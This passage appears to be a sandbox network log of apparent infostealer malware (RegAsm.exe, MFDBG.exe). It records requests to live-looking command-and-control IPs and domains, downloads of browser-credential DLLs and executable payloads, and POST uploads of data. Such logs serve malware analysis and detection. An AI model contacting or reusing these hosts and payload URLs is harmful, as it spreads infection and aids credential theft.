Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 7116
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://46.8.231.109/c4754d4f680ead72.php

RegAsm.exe

Remote address:

46.8.231.109:80

Request

POST /c4754d4f680ead72.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----EGIDAFBAEBKKEBFIJEBK
Host: 46.8.231.109
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 15:05:10 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 108
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://46.8.231.109/c4754d4f680ead72.php

RegAsm.exe

Remote address:

46.8.231.109:80

Request

POST /c4754d4f680ead72.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BAAAKJDAAFBAAKEBAAKF
Host: 46.8.231.109
Content-Length: 4787
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 15:05:10 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://46.8.231.109/1309cdeb8f4c8736/sqlite3.dll

RegAsm.exe

Remote address:

46.8.231.109:80

Request

GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1
Host: 46.8.231.109
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 15:05:10 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT
ETag: "10e436-5e7eeebed8d80"
Accept-Ranges: bytes
Content-Length: 1106998
Content-Type: application/x-msdos-program
POST

http://46.8.231.109/c4754d4f680ead72.php

RegAsm.exe

Remote address:

46.8.231.109:80

Request

POST /c4754d4f680ead72.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JKEHIIJJECFHJKECFHDG
Host: 46.8.231.109
Content-Length: 363
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 15:05:11 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://46.8.231.109/c4754d4f680ead72.php

RegAsm.exe

Remote address:

46.8.231.109:80

Request

POST /c4754d4f680ead72.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HIDHDAAEHIEHIECBKJDG
Host: 46.8.231.109
Content-Length: 363
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 15:05:11 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://46.8.231.109/1309cdeb8f4c8736/freebl3.dll

RegAsm.exe

Remote address:

46.8.231.109:80

Request

GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1
Host: 46.8.231.109
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 15:05:11 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
ETag: "a7550-5e7ebd4425100"
Accept-Ranges: bytes
Content-Length: 685392
Content-Type: application/x-msdos-program
GET

http://46.8.231.109/1309cdeb8f4c8736/mozglue.dll

RegAsm.exe

Remote address:

46.8.231.109:80

Request

GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1
Host: 46.8.231.109
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 15:05:11 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
ETag: "94750-5e7ebd4425100"
Accept-Ranges: bytes
Content-Length: 608080
Content-Type: application/x-msdos-program
GET

http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll

RegAsm.exe

Remote address:

46.8.231.109:80

Request

GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1
Host: 46.8.231.109
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 15:05:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
ETag: "6dde8-5e7ebd4425100"
Accept-Ranges: bytes
Content-Length: 450024
Content-Type: application/x-msdos-program
GET

http://46.8.231.109/1309cdeb8f4c8736/nss3.dll

RegAsm.exe

Remote address:

46.8.231.109:80

Request

GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1
Host: 46.8.231.109
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 15:05:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
ETag: "1f3950-5e7ebd4425100"
Accept-Ranges: bytes
Content-Length: 2046288
Content-Type: application/x-msdos-program
GET

http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll

RegAsm.exe

Remote address:

46.8.231.109:80

Request

GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1
Host: 46.8.231.109
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 15:05:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
ETag: "3ef50-5e7ebd4425100"
Accept-Ranges: bytes
Content-Length: 257872
Content-Type: application/x-msdos-program
GET

http://46.8.231.109/1309cdeb8f4c8736/vcruntime140.dll

RegAsm.exe

Remote address:

46.8.231.109:80

Request

GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1
Host: 46.8.231.109
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 15:05:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
ETag: "13bf0-5e7ebd4425100"
Accept-Ranges: bytes
Content-Length: 80880
Content-Type: application/x-msdos-program
POST

http://46.8.231.109/c4754d4f680ead72.php

RegAsm.exe

Remote address:

46.8.231.109:80

Request

POST /c4754d4f680ead72.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BGDAAKJJDAAKFHJKJKFC
Host: 46.8.231.109
Content-Length: 947
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 15:05:13 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://46.8.231.109/c4754d4f680ead72.php

RegAsm.exe

Remote address:

46.8.231.109:80

Request

POST /c4754d4f680ead72.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----FIDAFCAFCBKECBGCFIIJ
Host: 46.8.231.109
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 15:05:13 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 2408
Keep-Alive: timeout=5, max=84
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://46.8.231.109/c4754d4f680ead72.php

RegAsm.exe

Remote address:

46.8.231.109:80

Request

POST /c4754d4f680ead72.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----DHCAAEBKEGHJKEBFHJDB
Host: 46.8.231.109
Content-Length: 265
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 15:05:13 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=83
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://46.8.231.109/c4754d4f680ead72.php

RegAsm.exe

Remote address:

46.8.231.109:80

Request

POST /c4754d4f680ead72.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----DAEGIIECGHCBFHJKEHDB
Host: 46.8.231.109
Content-Length: 363
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 15:05:13 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=82
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://46.8.231.109/c4754d4f680ead72.php

RegAsm.exe

Remote address:

46.8.231.109:80

Request

POST /c4754d4f680ead72.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----CAFHIJDHDGDBFHIEHDGI
Host: 46.8.231.109
Content-Length: 272
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 15:05:13 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 260
Keep-Alive: timeout=5, max=81
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://46.8.231.109/c4754d4f680ead72.php

RegAsm.exe

Remote address:

46.8.231.109:80

Request

POST /c4754d4f680ead72.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCF
Host: 46.8.231.109
Content-Length: 272
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 15:05:15 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
DNS

109.231.8.46.in-addr.arpa

Remote address:

8.8.8.8:53

Request

109.231.8.46.in-addr.arpa

IN PTR

Response
GET

http://147.45.44.104/prog/66f42472a1351_vfdsgfsda.exe

RegAsm.exe

Remote address:

147.45.44.104:80

Request

GET /prog/66f42472a1351_vfdsgfsda.exe HTTP/1.1
Host: 147.45.44.104
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 25 Sep 2024 15:05:13 GMT
Content-Type: application/octet-stream
Content-Length: 413224
Last-Modified: Wed, 25 Sep 2024 14:55:46 GMT
Connection: keep-alive
Keep-Alive: timeout=120
ETag: "66f42472-64e28"
X-Content-Type-Options: nosniff
Accept-Ranges: bytes
GET

http://147.45.44.104/prog/66f4247d51812_lfdsjna.exe

RegAsm.exe

Remote address:

147.45.44.104:80

Request

GET /prog/66f4247d51812_lfdsjna.exe HTTP/1.1
Host: 147.45.44.104
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 25 Sep 2024 15:05:14 GMT
Content-Type: application/octet-stream
Content-Length: 377384
Last-Modified: Wed, 25 Sep 2024 14:55:57 GMT
Connection: keep-alive
Keep-Alive: timeout=120
ETag: "66f4247d-5c228"
X-Content-Type-Options: nosniff
Accept-Ranges: bytes
GET

http://147.45.44.104/prog/66f424e80b9cc_idsmds.exe

RegAsm.exe

Remote address:

147.45.44.104:80

Request

GET /prog/66f424e80b9cc_idsmds.exe HTTP/1.1
Host: 147.45.44.104
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 25 Sep 2024 15:05:15 GMT
Content-Type: application/octet-stream
Content-Length: 26112
Last-Modified: Wed, 25 Sep 2024 14:57:44 GMT
Connection: keep-alive
Keep-Alive: timeout=120
ETag: "66f424e8-6600"
X-Content-Type-Options: nosniff
Accept-Ranges: bytes
DNS

104.44.45.147.in-addr.arpa

Remote address:

8.8.8.8:53

Request

104.44.45.147.in-addr.arpa

IN PTR

Response
DNS

steamcommunity.com

RegAsm.exe

Remote address:

8.8.8.8:53

Request

steamcommunity.com

IN A

Response

steamcommunity.com

IN A

23.214.143.155
GET

https://steamcommunity.com/profiles/76561199780418869

RegAsm.exe

Remote address:

23.214.143.155:443

Request

GET /profiles/76561199780418869 HTTP/1.1
Host: steamcommunity.com
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Wed, 25 Sep 2024 15:05:17 GMT
Content-Length: 34781
Connection: keep-alive
Set-Cookie: sessionid=f37e72476835fa241d37f1a3; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=GB%7Ce15d564837abb028acb4e114150d704d; Path=/; Secure; HttpOnly; SameSite=None
DNS

155.143.214.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

155.143.214.23.in-addr.arpa

IN PTR

Response

155.143.214.23.in-addr.arpa

IN PTR

a23-214-143-155deploystaticakamaitechnologiescom
DNS

drawzhotdog.shop

RegAsm.exe

Remote address:

8.8.8.8:53

Request

drawzhotdog.shop

IN A

Response

drawzhotdog.shop

IN A

172.67.162.108

drawzhotdog.shop

IN A

104.21.58.182
POST

https://drawzhotdog.shop/api

RegAsm.exe

Remote address:

172.67.162.108:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: drawzhotdog.shop

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 15:05:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=7feelo97kvnc6iuvn03ek7491m; expires=Sun, 19 Jan 2025 08:51:56 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qYVCZuEYF%2FteNzU1h0wfOeTzS5UUUL9Vd4yfnFIL2ykBBsC8DK8tPRa43LV8aaz3qoQDkFrQ5h4c%2F18qHn%2BZkdrRRBRp7H4yeh6DWyjgL2b%2BausB4oJL5P9ippmXxt8ArsxM"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c8be9598c21b0f2-MAN
POST

https://drawzhotdog.shop/api

RegAsm.exe

Remote address:

172.67.162.108:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 42
Host: drawzhotdog.shop

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 15:05:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=1g0djlhbr70101t13ub47mnf2u; expires=Sun, 19 Jan 2025 08:51:57 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JdERlp4WjIX5EE4m3oDNLvfBJhSNntoJ7WwgWXi1i%2FEl%2FbM1Wg5oUCLAfC4Te4T7%2FZIK7nHYJ%2FzcHmHBpX7mC5Z2hMnlWg7rY4mUcnGj0EwZL9lHN78PnxobtSk8V2UPnqKZ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c8be962fbdeb0f2-MAN
POST

https://drawzhotdog.shop/api

RegAsm.exe

Remote address:

172.67.162.108:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12911
Host: drawzhotdog.shop

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 15:05:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=42p5umobhv6ehe3u3b27vrlnsk; expires=Sun, 19 Jan 2025 08:51:58 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VQDoBP3W7CwJ%2Bl7vrOeEy9QvbN1sgf4yAhc9%2BE8tN2Xb5Tsm4YtOAwEtsk%2F13DNY7qrs0%2B13afJDz%2F3O0c9RAdd4dARsGHgiQo8iaX2aBv0tAENALomKpMprri2skwRmmGyW"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c8be966ead7b0f2-MAN
GET

https://5.75.211.162/

RegAsm.exe

Remote address:

5.75.211.162:443

Request

GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 5.75.211.162
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 25 Sep 2024 15:05:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

yalubluseks.eu

MFDBG.exe

Remote address:

8.8.8.8:53

Request

yalubluseks.eu

IN A

Response

yalubluseks.eu

IN A

104.21.54.163

yalubluseks.eu

IN A

172.67.140.92
POST

https://yalubluseks.eu/get_update.php

MFDBG.exe

Remote address:

104.21.54.163:443

Request

POST /get_update.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: yalubluseks.eu
Content-Length: 19
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 15:05:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TTKKbbeJFM2hJ%2F7%2FnnI%2BMCITN7w2nS%2F%2FPaYhOrJ2u6vp5PaSIXXHU2Q6gH7knMiEG99fH5ndENTYML3fzMFeNEWO%2BQrDmi05qD22qRuZD5MoORB22ojMOzpIFaBM7aKghg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c8be95e6aa06552-LHR
POST

https://yalubluseks.eu/receive.php

MFDBG.exe

Remote address:

104.21.54.163:443

Request

POST /receive.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: yalubluseks.eu
Content-Length: 86
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 15:05:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qKAM6RUCGwrzpN55XvjbcPMqvsF2mZVrDbERColmyiquMqgdscT1Sk8AEXG0mRDcOhIISVFpWKh5uGNJSeCSKEZKagkpbL55BCXy7TtkjRsbl5e837TyECbqpTh6jnW1Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c8be961b82a6552-LHR
POST

https://yalubluseks.eu/get_file.php

MFDBG.exe

Remote address:

104.21.54.163:443

Request

POST /get_file.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: yalubluseks.eu
Content-Length: 86
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 15:05:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xR5eh80L5wQ2G1CpsXgJZGZpdliL4pCKWKH1rc%2FT4H%2Frj1o1UjrDr9M9AGFVhbiwCIip2Pix0vclcHfxGkJ9RpiPv7mvtIhdSWJpv666ez332seDoyod5X%2FXw5XTYPqZlA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c8be9658ead6552-LHR
DNS

108.162.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

108.162.67.172.in-addr.arpa

IN PTR

Response
DNS

api.ipify.org

MFDBG.exe

Remote address:

8.8.8.8:53

Request

api.ipify.org

IN A

Response

api.ipify.org

IN A

104.26.13.205

api.ipify.org

IN A

172.67.74.152

api.ipify.org

IN A

104.26.12.205
GET

http://api.ipify.org/

MFDBG.exe

Remote address:

104.26.13.205:80

Request

GET / HTTP/1.1
Host: api.ipify.org
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 15:05:18 GMT
Content-Type: text/plain
Content-Length: 13
Connection: keep-alive
Vary: Origin
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 8c8be9604ef5cd67-LHR
GET

http://api.ipify.org/

MFDBG.exe

Remote address:

104.26.13.205:80

Request

GET / HTTP/1.1
Host: api.ipify.org

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 15:05:18 GMT
Content-Type: text/plain
Content-Length: 13
Connection: keep-alive
Vary: Origin
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 8c8be9634b3ecd67-LHR
POST

https://5.75.211.162/

RegAsm.exe

Remote address:

5.75.211.162:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HIJJDGDHDGDAKFIECFIJ
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 5.75.211.162
Content-Length: 256
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 25 Sep 2024 15:05:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

162.211.75.5.in-addr.arpa

Remote address:

8.8.8.8:53

Request

162.211.75.5.in-addr.arpa

IN PTR

Response

162.211.75.5.in-addr.arpa

IN PTR

static162211755clientsyour-serverde
DNS

133.211.185.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.211.185.52.in-addr.arpa

IN PTR

Response
DNS

163.54.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

163.54.21.104.in-addr.arpa

IN PTR

Response
DNS

205.13.26.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

205.13.26.104.in-addr.arpa

IN PTR

Response
POST

https://5.75.211.162/

RegAsm.exe

Remote address:

5.75.211.162:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----IIEBAFCBKFIDGCAKKKFC
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 5.75.211.162
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 25 Sep 2024 15:05:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://drawzhotdog.shop/api

RegAsm.exe

Remote address:

172.67.162.108:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 9733
Host: drawzhotdog.shop

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 15:05:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=6t0qmcoh5ma3m3k2o01pm6irbp; expires=Sun, 19 Jan 2025 08:51:58 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hBK4esAeIPUxz6EQxEmxx%2FX0rr4V02SHpyeoBSa5H9s9%2F0jB9A3mXEFXRQ7RJEPv%2B217Vc22jUKT8Yddp82rHG6amQEh%2FgPls1aLlMgFVDHdhbZqeIqSne%2F9mb2q%2FNa%2F%2F2ru"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c8be969fe207747-LHR
alt-svc: h3=":443"; ma=86400
POST

https://5.75.211.162/

RegAsm.exe

Remote address:

5.75.211.162:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----JJDBGDHIIDAEBFHJJDBF
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 5.75.211.162
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 25 Sep 2024 15:05:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://drawzhotdog.shop/api

RegAsm.exe

Remote address:

172.67.162.108:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 18146
Host: drawzhotdog.shop

Response

HTTP/1.1 200 OK

Date: Wed, 25 Sep 2024 15:05:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=dsjfedq206s1be5cg1jc94p94m; expires=Sun, 19 Jan 2025 08:51:59 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zYyFc40ynd0AKzJEKiK0X9k%2FPrZEYaxQ6wvWy6iYN9Ws8x39xFbgYP8V3bgKwCokSqLH%2BgR0E3CB9%2FP1TrlTcIP7RrdfHZE6ZRCDWZOndm8BW4lpoTJ8EmR5q7IV6%2F20h8Zw"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c8be96d6bb9b3b7-MAN
POST

https://5.75.211.162/

RegAsm.exe

Remote address:

5.75.211.162:443

Request

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----JKEHIIJJECFHJKECFHDG
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 5.75.211.162
Content-Length: 332
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 25 Sep 2024 15:05:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

https://drawzhotdog.shop/api

RegAsm.exe

Remote address:

172.67.162.108:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
